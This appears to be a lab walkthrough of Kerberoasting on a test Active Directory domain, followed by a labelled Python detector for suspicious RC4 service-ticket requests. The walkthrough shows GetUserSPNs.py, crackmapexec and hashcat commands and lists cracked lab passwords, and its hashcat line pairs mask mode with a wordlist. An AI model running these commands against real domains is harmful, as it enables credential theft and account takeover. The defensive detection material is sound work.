Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within the Active Directory (AD).
In such an attack, an adversary posing as an account user requests a Kerberos ticket for a service principal name (SPN); the ticket contains data encrypted with the service account's password hash. (An SPN is an attribute that ties a service to a user account within the AD.) The adversary then works offline to crack the password hash, often using brute-force techniques.
Once the plaintext credentials of the service account are exposed, the adversary possesses user credentials that they can use to impersonate the account owner. In so doing, they appear to be an approved and legitimate user and have unfettered access to any systems, assets or networks granted to the compromised account.
GetUserSPNs.py -request -dc-ip 192.168.56.11 north.newyork.local/claudio.ortiz:babyboy -outputfile kerberoasting.hashes
You can also do that with cme, using the following command:
crackmapexec ldap 192.168.56.11 -u claudio.ortiz -p 'babyboy' -d north.newyork.local --kerberoasting kerberoasting.hashes
Let's try to crack the hashes:
hashcat -m 13100 --force -a 3 '$krb5tgs$23$*elena.Lopez$NORTH.NEWYORK.LOCAL$north.newyork.local/elena.Lopez*$8b765ed876f3d1a0159b4d10bbbbaf27$...' rockyou.txt
miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1
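
Detection logic for the defender side of the steps above, as an added example that is not part of the original page: it scans Windows Security Event ID 4769 (Kerberos service ticket requested) records for one account obtaining RC4 (etype 23, the `$krb5tgs$23$` type above) tickets for several user-backed service accounts within a short window. The event rows, the `app.user`, `ops.user` and `WEB01$` names, the timestamps and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the "$krb5tgs$23$" type that hashcat -m 13100 handles

# Constructed Event ID 4769 records (not real log data).
FIELDS = ("TimeCreated", "TargetUserName", "ServiceName", "TicketEncryptionType", "Status")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("2024-01-10T09:00:01", "claudio.ortiz@NORTH.NEWYORK.LOCAL", "elena.lopez", "0x17", "0x0"),
    ("2024-01-10T09:00:01", "claudio.ortiz@NORTH.NEWYORK.LOCAL", "miguel.cabrera", "0x17", "0x0"),
    ("2024-01-10T09:00:02", "claudio.ortiz@NORTH.NEWYORK.LOCAL", "pacofish", "0x17", "0x0"),
    ("2024-01-10T09:05:00", "app.user@NORTH.NEWYORK.LOCAL", "elena.lopez", "0x12", "0x0"),  # AES256
    ("2024-01-10T09:06:00", "app.user@NORTH.NEWYORK.LOCAL", "WEB01$", "0x17", "0x0"),  # machine account
    ("2024-01-10T08:00:00", "ops.user@NORTH.NEWYORK.LOCAL", "elena.lopez", "0x17", "0x0"),
    ("2024-01-10T11:00:00", "ops.user@NORTH.NEWYORK.LOCAL", "miguel.cabrera", "0x17", "0x0"),
    ("2024-01-10T14:00:00", "ops.user@NORTH.NEWYORK.LOCAL", "pacofish", "0x17", "0x0"),
]]


def is_candidate(ev):
    """True for a successfully issued RC4 ticket to a user-backed service account."""
    svc = ev["ServiceName"].lower()
    return (ev["Status"] == "0x0"
            and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$")  # machine accounts use long random passwords
            and svc != "krbtgt")       # TGT requests are not service-ticket roasting


def detect_kerberoasting(events, min_services=3, window=timedelta(minutes=5)):
    """Map each requester to the services it pulled RC4 tickets for, when it
    reached min_services distinct services inside one sliding window."""
    by_user = defaultdict(list)
    for ev in filter(is_candidate, events):
        when = datetime.fromisoformat(ev["TimeCreated"])
        by_user[ev["TargetUserName"].lower()].append((when, ev["ServiceName"].lower()))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1  # drop requests that fell out of the window
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                alerts[user] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

Tune `min_services` and `window` to the environment; accounts that legitimately need RC4 tickets will otherwise show up as noise.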